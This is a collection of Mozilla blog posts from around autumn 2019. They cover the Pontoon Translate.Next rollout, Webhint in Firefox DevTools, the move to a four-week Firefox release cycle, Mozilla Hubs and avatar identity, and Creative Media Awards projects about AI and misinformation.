Pontoon was started in 2011, and has grown quite a lot since then. Most of the back-end, using Python and Django, has been kept up-to-date and is still doing mostly fine, but the front-end, and specifically the Translate app, is in a terrible shape. Our code has accumulated a lot of technical debt, and is very difficult to maintain and evolve.

After I joined the Pontoon team in the summer of 2017, I spent some time auditing the translate application code, and it quickly became clear to me that a full rewrite would bring a lot of value. Here are some of the benefits this brings:

  1. removing technical debt and making our code saner;
  2. adding better test coverage for our front-end;
  3. enabling the localization of Pontoon, starting with the Translate page;
  4. structurally enabling some of the many improvements our users have been asking for.

Over the last year and a half, Matjaž and myself have been spending a lot of our time working on rewriting the Translate page from scratch, using more recent, better adapted technologies, making our code a lot more modular and maintainable. (If you are interested in knowing more about the technologies we used, it is described in our github repository — there’s some React, redux, Jest and Flow in there. )

How is it different from the current page?

Translate.Next is just the first part of our effort to improve Pontoon’s translation page, while the second part will be the functional changes we’ll start working on now. For the time being though, translation page should be as much as possible the same in terms of features, interface and usability as the current Translate page. We have done our best to reproduce the same layouts and behaviors so that the switch would be as transparent as possible to everyone.

However, there are a few things that we decided to change already. The most visible of them is the navigation menu, which now requires less clicks to navigate localizable resources thanks to the removal of the infamous Go button.

Here’s what it looks like now:

Pontoon's current Translate navigation bar

And here is what it looks like with Translate.Next:

Pontoon's new Translate navigation bar

The other changes should be fairly inoffensive. We have removed the Tab shortcut in the Editor, as well as support for in-context localization, as it seems both were hardly ever used. It’s also not possible to resize the columns yet, as we have plans to evolve the page layout very soon and the behavior of this feature will change.

If you notice something not mentioned here is different, then it’s very probably a bug, and we would like to hear from you. More on that later in this post!

When will I see the new page?

We intend to do a “rollout” release, meaning that we will turn the feature on for a small percentage of users, and then will increase that number over time until we reach 100%. The users who get to experience the new Translate.Next page will be chosen randomly by a tool we use.

However, we can, and will, add exceptions. Namely, everyone who participated in our last round of testing and has Translate.Next turned on will keep it on. And we can add more exceptions, so if you don’t want to wait for your turn, you can simply contact us (Adrian or Matjaž) with the email address you use to log in to Pontoon, and we’ll give you access.

Note that we will not allow users to opt out, unless there is a very good reason for that. We will take your feedback and categorize it into two buckets: regressions, and the rest. Regressions are big issues that prevent localizers from performing their tasks. They are blockers to advancing Mozilla’s mission and thus we want to take quick action to unblock people if that happens. A regression will very likely mean that we will turn Translate.Next off for everyone until we have fixed it.

Every other issue will be treated as a bug, and we will do our best to solve these in a timely manner, but we kindly ask that you bear with us in the meantime. We do not want to revert everyone back to the old Translate page for a problem that is not blocking you.

The release schedule, baring we don’t find any regressions, is as follow:

Wednesday, October 2: release to a random 10% of users.
Monday, October 7: release to a random 30% of users.
Wednesday, October 9: release to a random 50% of users.
Monday, October 14: release to all users.

Bugs and regressions found along the way will delay that schedule. We will keep you updated if any such thing happens.

How do I report issues?

If you notice that something works differently than before, or if you find that something is broken, we strongly encourage you to tell us as soon as possible. There are several ways you can do that.

The easiest is to simply add a comment here, below this blog post. Please write a description of your problem, and ideally steps to reproduce it. When commenting, make sure to put a valid email address in the “E-mail” field so that we can reach out to you if we need more details.

If you enjoy using the Mozilla Community discourse forum, you can also describe your issue in the dedicated Translate.Next topic.

And finally, if you are comfortable using Bugzilla, you can go straight there and file a bug.

If you want to check our list of known issues, or follow the status of a reported bug, we keep an updated list on Pontoon’s Wiki page.

Other questions

How do I know I’m using Translate.Next?

There are 2 ways to know: first, the menu will look a bit different (see above). Second, and probably simpler: there will be a message in the top right corner saying you are using Translate.Next. 🙂

Can I revert back to the old Translate page?

No, once you’re on Translate.Next, the only way to get back to the old Translate page is if we find a critical regression and revert everyone. We cannot revert individuals to the old page.

Can I opt-in to Translate.Next?

Yes, absolutely. Just contact us (Adrian or Matjaž) asking that you want in, and give us the email address that you use to login on Pontoon.

Let’s release!

Thank you for helping with this release. We hope you will enjoy the new Translate page, and all the cool changes we will be able to make in the future thanks to that. And keep an eye out for the new page to show up on your Pontoon. 😉

hacks.mozilla.orgWebHint in Firefox DevTools: Improve Compatibility, Accessibility and more

Creating experiences that look and work great across different browsers is one of the biggest challenges on the web. It also is the most rewarding part, as it gets your app to as many users as possible. On the other hand, cross-browser compatibility is also the web’s biggest frustration. Testing legacy browsers late in the development process can break a feature that you spent hours on, even requiring rewrites to fix.

What if the tools in your primary development browser could warn you sooner? Thanks to Webhint in Firefox DevTools, we can do exactly that, and more.

The Webhint engine

Webhint provides feedback about your site’s compatibility, performance, security, and accessibility to guide improvements. A key benefit is integration across the development cycle — while you author in VS Code, test in CI/CD automation, or benchmark sites in the online scanner. Having Webhint available in DevTools adds in-page context and inspection capabilities.

Firefox playing Chromium-frisbee with Narwhal Nelli, for real!

Firefox DevTools was happy to collaborate with the Webhint team, which just released version 1.0 of their extension. With the recommendations that the DevTools panel provides, developers on any browser (there is also a Chrome extension) can spend less time looking up cross-browser compatibility tables like caniuse or MDN. The cross-browser guidance for CSS and HTML, a core part of the 1.0 release, is also one of the first projects to apply MDN’s browser-compat-data on code to detect compatibility.

The foundation to build on

The hints are not rules written in stone. In fact, the hint engine is extensible by design so developers can capture their own expertise and best practices for their projects. We also have plans to tweak the heuristics behind recommendations, especially for new ground like compatibility, based on your feedback. We are also working to integrate recommendations further into DevTools. Everything should be at your fingertips when you need it.

Wrapping up

Install Webhint for Firefox, Chrome or Edge (Chromium) and run it against your old and new projects. Find out how you could further optimize compatibility, security, accessibility, and speed. We hope it will help you to make your site work for as many users as possible.

The post WebHint in Firefox DevTools: Improve Compatibility, Accessibility and more appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogFirefox and Tactical Tech Bring The Glass Room to San Francisco

After welcoming more than 30,000 visitors in Berlin, New York, and London, The Glass Room is coming to San Francisco on October 16, 2019.

From the tech boom to techlash, our favorite technologies have become intertwined with our daily lives. As technology is embedded in everything from dating to driving and from the environment to elections, our desire for convenience has given way to trade-offs for our privacy, security, and wellbeing. 

The Glass Room, curated by Tactical Tech and produced by Firefox, is a place to explore how technology and data are shaping our perceptions, experiences, and understanding of the world. The most connected generation in history is also the most exposed, as people’s privacy becomes the fuel for technology’s incredible growth. What’s gained and lost — and who decides — are explored at the Glass Room.

The Glass Room is in a 28,000 square-foot former retail store, located at 838 Market Street, across from Westfield San Francisco Centre, in the heart of the Union Square Retail District. It will be open to the public from October 16th through November 3rd. The location is intentional, meant to entice shoppers into the store and help them leave better equipped to make informed choices about technology and how it impacts their personal data, privacy, and security.

The Glass Room is a pop-up store with a twist, presenting more than 50 provocative tech products in an unexpected environment. This installment arrives in San Francisco to turn a mirror on Silicon Valley, to the people who make our technologies and those who are affected by its impact on society. “The biggest change since we launched The Glass Room in New York in 2016 and in London in 2017 is that the overall mood of tech users and consumers has shifted,” says Stephanie Hankey, of Tactical Tech. “People are starting to question how things work, how it affects them and what they can do about it. The Glass Room is a great way for users of technology to engage on a deeper level and make more informed choices. Each piece in The Glass Room tells a different story about data and technology, so there is something for everyone to connect with.”

This interactive public exhibit also includes a Data Detox Bar, where a team of in-house experts called Ingeniuses will dispense practical tips, tricks, and advice. There will also be a program of talks and workshops to foster debate, discussion, and solution-finding.

“We build the family of Firefox products to help people take charge of their data online, and give them control with features and tools that put privacy first,” says Mary Ellen Muckerman, Vice President of Brand Engagement. “We know it’s our job to help people understand what’s happening behind the scenes of the technology they love and we hope that events like The Glass Room help inform people about how to protect themselves online.”

At this turning point in the age of wider technological advancement, The Glass Room marks a moment to reflect on what our next steps should be. How do we want to shape our relationship with technology in the future?

More Details

October 16th – November 3rd 2019
838 Market Street, San Francisco
12pm–8pm daily
Free and open to the public



The post Firefox and Tactical Tech Bring The Glass Room to San Francisco appeared first on The Mozilla Blog.

Open Policy & AdvocacyCharting a new course for tech competition

As the internet has become more and more centralized, more opportunity for anticompetitive gatekeeping behavior has arisen. Yet competition and antitrust law have struggled to keep up, and all around the world, governments are reviewing their legal frameworks to consider what they can do.

Today, Mozilla released a working paper discussing the unique characteristics of digital platforms in the context of competition and offer a new framework to approach future-proof competition policy for the internet. Charting a course focused on a set of proposals distinct from both the status quo and pure structural reform, this paper proposes stronger single-firm conduct enforcement to capture a modern set of harmful gatekeeping behaviors by powerful firms; tougher merger review, particularly for vertical mergers, to weigh the full spectrum of potential competitive harm; and faster agency processes that can be responsive within the rapid market cycles of tech. And across all competition policy making and enforcement, this paper proposes that standards and interoperability be at the center.

The internet’s unique formula for innovation and productive disruption depends on market entry and growth, put at risk as centralized access to data and networks become more and more of an insurmountable advantage. But we can see a light at the end of the silo, if legislators and competition authorities embrace their duty to internet users and modernize their legal and policy frameworks to respond to today’s challenges and to protect the core of what has made the internet such a powerful engine for socioeconomic benefit.

The post Charting a new course for tech competition appeared first on Open Policy & Advocacy.

QMOFirefox 70 Beta 10 Testday, September 27th

Hello Mozillians,

We are happy to let you know that FridaySeptember 27th, we are organizing Firefox 70 Beta 10 Testday. We’ll be focusing our testing on: Password Manager.

Check out the detailed instructions via this gdoc.

*Note that this events are no longer held on etherpad docs since public.etherpad-mozilla.org was disabled.

No previous testing experience is required, so feel free to join us on #qa IRC channel where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Mozilla Add-ons BlogCommunity Involvement in Recommended Extensions

Firefox Logo on blue backgroundIn July we launched the Recommended Extensions program, which entailed a complete reboot of our editorial process on addons.mozilla.org (AMO). Previously we placed a priority on regularly featuring new extensions to explore. With the Recommended program, we’ve shifted our focus to editorially vetting and monitoring a fairly fixed collection of high-quality extensions.

For years community contributors on the Featured Extensions Board played a big role in selecting AMO’s monthly curated content. We intend to maintain a community project aligned with the new Recommended program. We’re in the process now of reshaping the project to be known as the Recommended Extensions Community Board. As before, the board will be comprised of contributors who possess a keen passion for, and expertise of, browser extensions. Board membership will rotate every six months.

The add-ons team is currently assembling the first Recommended Extensions Community Board. To help shape the foundation of this project, we’re aiming to fill the debut board with some of our most prolific past editorial contributors. In general, the Recommended Extensions Community Board will focus on:

  • Ongoing evaluation of current Recommended extensions. All Recommended extensions are under active development. As such, contributors will participate in ongoing re-evaluations to ensure the curated list maintains a high overall quality standard.
  • Evaluating new submissions. As mentioned above, we do not anticipate significant amounts of churn on the Recommended list. That said, Firefox users want the latest and greatest extensions available, so the board will also play a role in evaluating new candidate submissions.
  • Special projects. Each board will also focus on a special project or two. For instance, we may closely examine a specific type of content within the Recommended list (e.g. let’s look at all of the Recommended bookmark managers; is this the strongest collection of bookmark managers we can compile?)

Future boards (rotating every six months) will have an open enrollment process. When the time arrives to form the next board, we’ll post information on the application process here on this blog and our other communication channels.

If you are interested in exploring the current curated list, here are all Recommended extensions.

The post Community Involvement in Recommended Extensions appeared first on Mozilla Add-ons Blog.

hacks.mozilla.orgExploring Collaboration and Communication with Mozilla Hubs

In April last year, Mozilla introduced Hubs, an immersive social experience that brings users together in shared 3D spaces. Hubs runs in the browser on mobile, desktop, and virtual reality devices. Since its initial release, the platform has undergone extensive development work to better enable communities and creators to embrace the opportunities that online collaborative environments have to offer. As a result, we’ve seen increased adoption of Hubs and new use cases have emerged.

The ability to connect to anyone around the world is a powerful tool available to us through the internet. As we look at advancements in mixed reality like the WebXR API, we are able to explore ways to feel more present with others through technology. One area where virtual reality shows considerable promise is in supporting distributed teams.

Mozilla is no stranger to remote collaboration. 46% of our employees work from home and the ten company offices span seven countries across six time zones. Because of this, we’re excited about finding opportunities to improve the ways we connect with our community of contributors and volunteers. Remote work and collaboration is a core part of how we connect to each other through the web.

Four avatars in Hubs stand around a white board in a shared 3D space. The whiteboard has a chart in the background.

Communication and Identity

Hubs is built on top of WebRTC and supports real-time conversations between users in a shared environment. Users embody 3D models in the glTF format called avatars, which they can control via WASD keys or through the application’s teleportation controls. Because these avatars ground users in a shared space, people can interact naturally. Spatial audio means that you can break off into small groups and have conversations that broadcast your voice based on your position near others in the room. Similarly, supporting both spoken and text chat between users allows for multiple forms of communication. This can provide more equitable participation compared to other online conferencing platforms.

Video conversations can be powerful forms of communication between trusted parties, but there are some times that you don’t want to share a video stream to a group of people. Establishing trust with other people online takes time. With Hubs, preserving privacy is integral to the platform’s shared 3D spaces. This applies to how you look in Hubs, too. Over the past few months, the Hubs team has released a set of customization capabilities for avatars. These allow creators and users to find more ways to represent themselves within the rooms they participate in. Avatars can be easily modified and customized by users on the Hubs website or with 3D modeling tools. Offering flexible options for a user’s identity within an online social platform is a core component of online safety, which you can read more about in the Mozilla Reality blog post here.

Customization and Collaboration

In addition to new avatar features, we also launched an online 3D editor called Spoke. Spoke can be used to create scenes for Hubs rooms. This allows users to compose spaces using 3D models and traditional web content like videos, images, gifs, and PDFs. Spoke environments can truly transform a space and make it a unique place for communities and organizations to meet. Scenes can also be listed as remixable. Other Hubs users can then use these scenes as templates for their own content. In the coming weeks, we’ll also add the ability to create themed kits for Spoke.

Different web content providers power the Create menu in Hubs so users can bring in their own media to share. This can include images, models, and videos found on the web or their own files. Through the Create menu, anyone can create and share documents and objects in an easy, collaborative manner. Users can also share their webcam or share their computer screen with their rooms.

Supporting Communities and Organizations

Throughout the past year, we’ve heard some inspiring stories about how individuals, communities, and organizations are using Hubs to strengthen their missions and stay connected. Communities are powerful ecosystems, and we did a sprint this past year to build out additional integrations and keep users connected with their friends more easily. We have recently also built new community management tools for events.

In addition to new community management tools, we’ve begun work on a new set of tools that takes the core infrastructure powering hubs.mozilla.com. This will allow anyone to stand up their own self-hosted version of the platform for their own use, and will include the ability to add custom branding and host rooms through a company-provided domain.

Join the Hubs Community

If you’re interested in Hubs and bringing 3D content to the web, try it out and share your feedback! The code powering Hubs is available online on GitHub under the MPL (Mozilla Public License) and we welcome contributions from the community. Join the Hubs Discord Server or follow Hubs on Twitter to connect with the team. You can also participate in our virtual events to learn more.


The post Exploring Collaboration and Communication with Mozilla Hubs appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogIntroducing ‘Stealing Ur Feelings,’ an Interactive Documentary About Big Tech, AI, and You

Stealing Ur Feelings‘ uses dark humor to expose how Snapchat, Instagram, and Facebook can use AI to profit off users’ faces and emotions


An augmented reality film revealing how the most popular apps can use facial emotion recognition technology to make decisions about your life, promote inequalities, and even destabilize democracy makes its worldwide debut on the web today. Using the same AI technology described in corporate patents, “Stealing Ur Feelings,” by Noah Levenson, learns the viewers’ deepest secrets just by analyzing their faces as they watch the film in real-time.

Watch https://stealingurfeelin.gs/

Viewer scorecard from ‘Stealing Ur Feelings’

The six-minute documentary explains the science of facial emotion recognition technology and demystifies how the software picks out features like your eyes and mouth to understand if you’re happy, sad, angry, or disgusted. While it is not confirmed whether big tech companies have started using this AI, “Stealing Ur Feelings” explores its potential applications, including a Snapchat patent titled “Determining a mood for a group.” The diagrams from the patent show Snapchat using smartphone cameras to analyze and rate users’ expressions and emotions at concerts, debates, and even a parade.

The documentary was made possible through a $50,000 Creative Media Award from Mozilla. The Creative Media Awards reflect Mozilla’s commitment to partner with artists to engage the public in exploring and understanding complex technical issues, such as the potential pitfalls of AI in dating apps (Monster Match) and the hiring process (Survival of the Best Fit).

“Stealing Ur Feelings” is debuting online alongside a petition from Mozilla to Snapchat. Viewers are asked to smile at the camera at the end of the film if they would like to sign a petition demanding Snapchat to publicly disclose whether or not it is already using facial emotion recognition technology in its app. Once the camera detects a smile, the viewer is taken to a Mozilla petition, which they can read and sign.  

The documentary also generates a downloadable scorecard featuring a photo of the viewer with Snapchat-like filters and lenses. The unique image reveals some tongue-in-cheek assumptions that the AI makes about the viewer while watching the film. These include the viewer’s IQ, annual income, and how much they like pizza and Kanye West.

“Stealing Ur Feelings” has screened at several distinguished film festivals and exhibits in recent months, including the Tribeca Film Festival, Open City Documentary Festival, Camden International Film Festival, and the Tate Modern. Later this year, the film will screen at Tactical Tech’s Glass Room installation in San Francisco. The film has already been inducted into MIT’s prestigious docubase and praised by the Museum of the Moving Image.

“Facial recognition is the perfect tool to extract even more data from us, all the time, everywhere — even when we’re not scrolling, typing, or clicking,” said Noah Levenson, the New York-based artist and engineer who created “Stealing Ur Feelings. “Set against the backdrop of Cambridge Analytica and the digital privacy scandals rocking today’s news, I wanted to create a fast, darkly funny, dizzying unveiling of the ‘fun secret feature’ lurking behind our selfies.” Levenson was recently named a Rockefeller Foundation Bellagio Resident Fellow on artificial intelligence.

“Artificial intelligence is increasingly interwoven into our everyday lives,” said Mark Surman, Mozilla’s Executive Director. “Mozilla’s Creative Media Awards seek to raise awareness about the potential of AI, and ensure the technology is used in a way that makes our lives better rather than worse.”

The post Introducing ‘Stealing Ur Feelings,’ an Interactive Documentary About Big Tech, AI, and You appeared first on The Mozilla Blog.

Mozilla L10NL10n Report: September Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

New content and projects

What’s new or coming up in Firefox desktop

As anticipated in the previous edition of the L10N Report, Firefox 70 is going to be a large release, introducing new features and several improvements around Tracking Protection, privacy and security. The deadline to ship any updates in Firefox 70 is October 8. Make sure to test your localization before the deadline, focusing on:

  • about:protections
  • about:logins
  • Privacy preferences and protection panel (the panel displayed when you click on the shield icon in the address bar)

Be also mindful of a few last-minute changes that were introduced in Beta to allow for better localization.

If your localization is missing several strings and you don’t know where to start from, don’t forget that you can use Tags in Pontoon to focus on high priority content first (example).

Upcoming changes to the release cycle

The current version of the rapid release cycle allows for cycles of different length, ranging from 6 to 8 weeks. Over two years ago we moved to localize Nightly by default. Assuming an average 6-weeks cycle for the sake of simplicity:

  • New strings are available for localization a few days after landing in mozilla-central and showing up in Nightly (they spend some time in a quarantine repository, to avoid exposing localizers to unclear content).
  • Depending on when a string lands within the cycle, you’d have up to 6 weeks to localize before it moves to Beta. In the worst case scenario, a string could land at the very end of the cycle, and will need to be translated after that version of Firefox moves to Beta.
  • Once it moves to Beta, you still have almost the full cycle (4.5 weeks) to localize. Ideally, this time should be spent to fine tune and test the localization, more than catching up with missing strings.

A few days ago it was announced that Firefox is progressively moving to a 4-weeks release cycle. If you’re focusing your localization on Nightly, this should have a relatively small impact on your work:

  • In Nightly, you’d have up to 4 weeks to localize content before i moves to Beta.
  • In Beta, you’d have up to 2.5 weeks to localize.

The cycles will shorten progressively, stabilizing to 4 weeks around April 2020. Firefox 75 will be the first one with a 4-weeks cycle in both Nightly and Beta.

While this shortens the time available for localization, it also means that the schedule becomes predictable and, more importantly, localization updates can ship faster: if you fix something in Beta today, it could take up to 8 weeks to ship in release. With the new cycle, it will always take a maximum of 4 weeks.

What’s new or coming up in web projects

Firefox Accounts

A lot more strings have landed since the last report.  Please allocate time accordingly after finishing other higher priority projects. An updated deadline will be added to Pontoon in the coming days. This will ensure localized content is on production as part of the October launch.


A few pages have been recently added and more will be added in the coming weeks to support the major release in October. Most of the pages will be enabled in de, en-CA, en-GB, and fr locales only, and some can be opted-in. Please note, Mozilla staff editors will be localizing the pages in German and French.

Legal documentation

We have quite a few updates in legal documentation. If your community is interested in reviewing any of the following, please adhere to this process: All change requests will be done through pull requests on GitHub. With a few exceptions, all the suggested changes should go through a peer review for approval before the changes go to production.

MDN & SuMo

Due to recent merge to a single Bengali locale on the product side, the articles were consolidated as well. For the overlapped articles, the ones selected were based on criteria such as article completion and the date of the completion.

What’s new or coming up in SuMo

Newly published articles for Fire TV:

Newly published articles for Preview:

Newly published articles for Firefox for iOS:

Improving TM matching of Fluent strings

Translation Memory (TM) matching has been improved by changing the way we store Fluent strings in our TM. Instead of storing full messages (together with their IDs and other syntax elements), we now store text only. Obviously, that increases the number of results shown in the Machinery tab, and also makes our TMX exports more usable. Thanks to Jordi Serratosa for driving this effort forward! As part of the fix, we also discovered and fixed bug 1578155, which further improves TM matching for all file formats.

Faster saving of translations.

As part of fixing bug 1578057, Michal Stanke discovered a potential speed up for saving translations. Specifically, improving the way we update the latest activity column in dashboards resulted in a noticeable speedup of 10-20% for saving a translation. That’s a huge win for an operation that happens around 2,000 times every day. Well done, Michal!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Mozilla VR BlogVirtual identities in Hubs

Virtual identities in Hubs

Identity is a complicated concept—who are we really? Most of us have government IDs that define part of our identity, but that’s just a starting point. We present ourselves differently depending on context—who we are with our loved ones might not be the same as who we are at work, but both are legitimate representations of ourselves.

Virtual spaces make this even harder. We might maintain many virtual identities with different degrees of overlap. Having control over our representation and identity online is a critical component of safety and privacy, and platforms should prioritize user agency.

More importantly, autonomy and privacy are intrinsically intertwined. If everyone saw my google searches, I would probably change what I search for. If I knew my employer could monitor my interactions when I’m not at work, I would behave differently. Privacy isn’t just about protecting information about myself, it’s about allowing me to express myself.


Avatars are a digital representation of individuals. They enable virtual embodiment, making communication in a virtual environment more natural and analogous to communication in real life. They also help us ground ourselves spatially in the 3D environment and allow others to have a specific point to reference, which enables directional sentiment and simulated eye contact.

Your decisions about avatar representation can both reveal personally identifiable information about you, such as your face and affect your self-perception and influence your behavior. This phenomenon is known as the Proteus Effect. This effect can induce societal biases, like feeling more confident when embodying taller avatars.

When we think about applying concepts related to identity to social VR platforms like Hubs, platforms need to design and implement features that focus on enabling users to easily manage their identities. On the avatar side, that means making it really easy to choose, change, and customize avatars so that you decide how much or little you want it to represent you.

In Hubs, we chose robots as the default avatar instead of picking a single human representation. However, any glb files can be used as the base avatar form - it was important for us that the platform could support any number of avatar styles, driven by the communities and users themselves. That means if you prefer cats or pinecones, you have the flexibility to choose that representation for yourself instead.

When it comes to determining visual identity of one’s self in a 3D space, that control should belong to the user, not the platform.


When you interact with others online, there is a risk of exposing different parts of your identity to them and it isn’t always clear what is exposed when you make an account on a website. Your profile on a social network, for example, may have an image of you shared with other people, display your legal name, or show an account pseudonym that you use with other online services.

Hubs allows you to use the platform regardless of whether or not you have an account, but one of the benefits of account-based services is the ability to have a known identity that can be responsible for certain actions and behaviors. Certain actions, like being promoted to a room moderator, require an account. A challenge with pseudonymous and anonymous spaces is that a lack of a valued account can also result in a lack of accountability.

Hubs accounts are purposely lightweight, requiring only an email address. Being able to tie your virtual identity to a second account, such as a Discord account, can provide further benefits, such as increased room security, and the ability to communicate across different platforms. Particularly when room links are more widely distributed, the room dynamics can benefit from linking users to a known identity— but platforms should respect how much information they request from users.

There’s a balance with how much knowledge the platforms need to validate identities and how much data users need to provide. When possible, personal information collection should be minimized.

Mozilla Hubs is an open source social VR platform—come try it out at hubs.mozilla.com or contribute here. Read more about privacy in Hubs here.

hacks.mozilla.orgMoving Firefox to a faster 4-week release cycle

Editor’s Note: Wednesday, 10:40am PT. We’ve updated this post with the following correction: The SeaMonkey Project consumes Firefox releases, not SpiderMonkey, which is Firefox’s JavaScript engine. Thanks to an astute reader for noticing.


We typically ship a major Firefox browser (Desktop and Android) release every 6 to 8 weeks. Building and releasing a browser is complicated and involves many players. To optimize the process, and make it more reliable for all users, over the years we’ve developed a phased release strategy that includes ‘pre-release’ channels: Firefox Nightly, Beta, and Developer Edition. With this approach, we can test and stabilize new features before delivering them to the majority of Firefox users via general release.

Today’s announcement

And today we’re excited to announce that we’re moving to a four-week release cycle! We’re adjusting our cadence to increase our agility, and bring you new features more quickly. In recent quarters, we’ve had many requests to take features to market sooner. Feature teams are increasingly working in sprints that align better with shorter release cycles. Considering these factors, it is time we changed our release cadence.

Starting Q1 2020, we plan to ship a major Firefox release every 4 weeks. Firefox ESR release cadence (Extended Support Release for the enterprise) will remain the same. In the years to come, we anticipate a major ESR release every 12 months with 3 months support overlap between new ESR and end-of-life of previous ESR. The next two major ESR releases will be ~June 2020 and ~June 2021.

Shorter release cycles provide greater flexibility to support product planning and priority changes due to business or market requirements. With four-week cycles, we can be more agile and ship features faster, while applying the same rigor and due diligence needed for a high-quality and stable release. Also, we put new features and implementation of new Web APIs into the hands of developers more quickly. (This is what we’ve been doing recently with CSS spec implementations and updates, for instance.)

In order to maintain quality and minimize risk in a shortened cycle, we must:

  • Ensure Firefox engineering productivity is not negatively impacted.
  • Speed up the regression feedback loop from rollout to detection to resolution.
  • Be able to control feature rollout based on release readiness.
  • Ensure adequate testing of larger features that span multiple release cycles.
  • Have clear, consistent mitigation and decision processes.

Firefox rollouts and feature experiments

Given a shorter Beta cycle, support for our pre-release channel users is essential, including developers using Firefox Beta or Developer Edition. We intend to roll out fixes to them as quickly as possible. Today, we produce two Beta builds per week. Going forward, we will move to more frequent Beta builds, similar to what we have today in Firefox Nightly.

Staged rollouts of features will be a continued best practice. This approach helps minimize unexpected (quality, stability or performance) disruptions to our release end-users. For instance, if a feature is deemed high-risk, we will plan for slow rollout to end-users and turn the feature off dynamically if needed.

We will continue to foster a culture of feature experimentation and A/B testing before rollout to release. Currently, the duration of experiments is not tied to a release cycle length and therefore not impacted by this change. In fact, experiment length is predominantly a factor of time needed for user enrollment, time to trigger the study or experiment and collect the necessary data, followed by data analysis needed to make a go/no-go decision.

Despite the shorter release cycles, we will do our best to localize all new strings in all locales supported by Firefox. We value our end-users from all across the globe. And we will continue to delight you with localized versions of Firefox.

Firefox release schedule 2019 – 2020

Firefox engineering will deploy this change gradually, starting with Firefox 71. We aim to achieve 4-week release cadence by Q1 2020. The table below lists Firefox versions and planned launch dates. Note: These are subject to change due to business reasons.

a table showing the release dates for Firefox GA and pre-release channels, 2019-2020

Process and product quality metrics

As we slowly reduce our release cycle length, from 7 weeks down to 6, 5, 4 weeks, we will monitor closely. We’ll watch aspects like release scope change; developer productivity impact (tree closure, build failures); beta churn (uplifts, new regressions); and overall release stabilization and quality (stability, performance, carryover regressions). Our main goal is to identify bottlenecks that prevent us from being more agile in our release cadence. Should our metrics highlight an unexpected trend, we will put in place appropriate mitigations.

Finally, projects that consume Firefox mainline or ESR releases, such as SeaMonkey and Tor will have to do more frequent releases if they wish to stay current with Firefox releases. These Firefox releases will have fewer changes each so they should be correspondingly easier to integrate. The 4-week releases of Firefox will be the most stable, fastest, and best quality builds.

In closing, we hope you’ll enjoy the new faster cadence of Firefox releases. You can always refer to https://wiki.mozilla.org/Release_Management/Calendar for the latest release dates and other information. Got questions? Please send email to release-mgmt@mozilla.com.

The post Moving Firefox to a faster 4-week release cycle appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogExamining AI’s Effect on Media and Truth

Mozilla is announcing its eight latest Creative Media Awards. These art and advocacy projects highlight how AI intersects with online media and truth — and impacts our everyday lives


Today, one of the biggest issues facing the internet — and society — is misinformation.

It’s a complicated issue, but this much is certain: The artificial intelligence (AI) powering the internet is complicit. Platforms like YouTube and Facebook recommend and amplify content that will keep us clicking, even if it’s radical or flat out wrong.

Earlier this year, Mozilla called for art and advocacy projects that illuminate the role AI plays in spreading misinformation. And today, we’re announcing the winners: Eight projects that highlight how AI like machine learning impacts our understanding of the truth.

These eight projects will receive Mozilla Creative Media Awards totalling $200,000, and will launch to the public by May 2020. They include a Turing Test app; a YouTube recommendation simulator; educational deepfakes; and more. Awardees hail from Japan, the Netherlands, Uganda, and the U.S. Learn more about each awardee below.

Mozilla’s Creative Media Awards fuel the people and projects on the front lines of the internet health movement. Past Creative Media Award winners have built mock dating apps that highlight algorithmic discrimination; they’ve created games that simulate the inherent bias of automated hiring; and they’ve published clever tutorials that mix cosmetic advice with cybersecurity best practices.

These eight awards align with Mozilla’s focus on fostering more trustworthy AI.

The winners


[1] Truth-or-Dare Turing Test | by Foreign Objects in the U.S.

This project explores deceptive AI that mimic real humans. Users play truth-or-dare with another entity, and at the conclusion of the game, must guess if they were playing with a fellow human or an AI. (“Truths” are played out using text, and “dares” are played out using an online sketchpad.) The project also includes a website outlining the state of mimicry technology, its uses, and its dangers.


[2] Swap the Curators in the Tube | by Tomo Kihara in Japan

This project explores how recommendation engines present different realities to different people. Users will peruse the YouTube recommendations of five wildly different personas — including a conspiracist and a racist persona — to experience how their recommendations differ.


[3] An Interview with ALEX | by Carrie Wang in the U.S.

The project is a browser-based experience that simulates a job interview with an AI in a future of gamified work and total surveillance. As the interview progresses, users learn that this automated HR manager is covering up the truth of this job, and using facial and speech recognition to make assumptions and decisions about them.


[4] The Future of Memory | by Xiaowei Wang, Jasmine Wang, and Yang Yuting in the U.S.

This project explores algorithmic censorship, and the ways language can be made illegible to such algorithms. It reverse-engineers how automated censors work, to provide a toolkit of tactics using a new “machine resistant” language, composed of emoji, memes, steganography and homophones. The project will also archive censored materials on a distributed, physical network of offline modules.


[5] Choose Your Own Fake News | by Pollicy in Uganda

This project uses comics and audio to explore how misinformation spreads across the African continent. Users engage in a choose-your-own-adventure game that simulates how retweets, comments, and other digital actions can sow misinformation, and how that misinformation intersects with gender, religion, and ethnicity.



[6] Deep Reckonings | by Stephanie Lepp in the U.S.

This project uses deepfakes to address the issue of deepfakes. Three false videos will show public figures — like tech executives — reckoning with the dangers of synthetic media. Each video will be clearly watermarked and labeled as a deepfake to prevent misinformation.


[7] In Event of Moon Disaster | by Halsey Burgund, Francesca Panetta, Magnus Bjerg Mortensen, Jeff DelViscio and the MIT Center for Advanced Virtuality

This project uses the 1969 moon landing to explore the topic of modern misinformation. Real coverage of the landing will be presented on a website alongside deepfakes and other false content, to highlight the difficulty of telling the two apart. And by tracking viewers’ attention, the project will reveal which content captivated viewers more.


[8] Most FACE Ever | by Kyle McDonald in the U.S.

This project teaches users about computer vision and facial analysis technology through playful challenges. Users will enable their webcam, engage with facial analysis, and try to “look” a certain way — say, “criminal,” or “white.” The game reveals how inaccurate and biased facial analysis can often be.

These eight awardees were selected based on quantitative scoring of their applications by a review committee, and a qualitative discussion at a review committee meeting. Committee members included Mozilla staff, current and alumni Mozilla Fellows and Awardees, and outside experts. Selection criteria is designed to evaluate the merits of the proposed approach. Diversity in applicant background, past work, and medium were also considered.

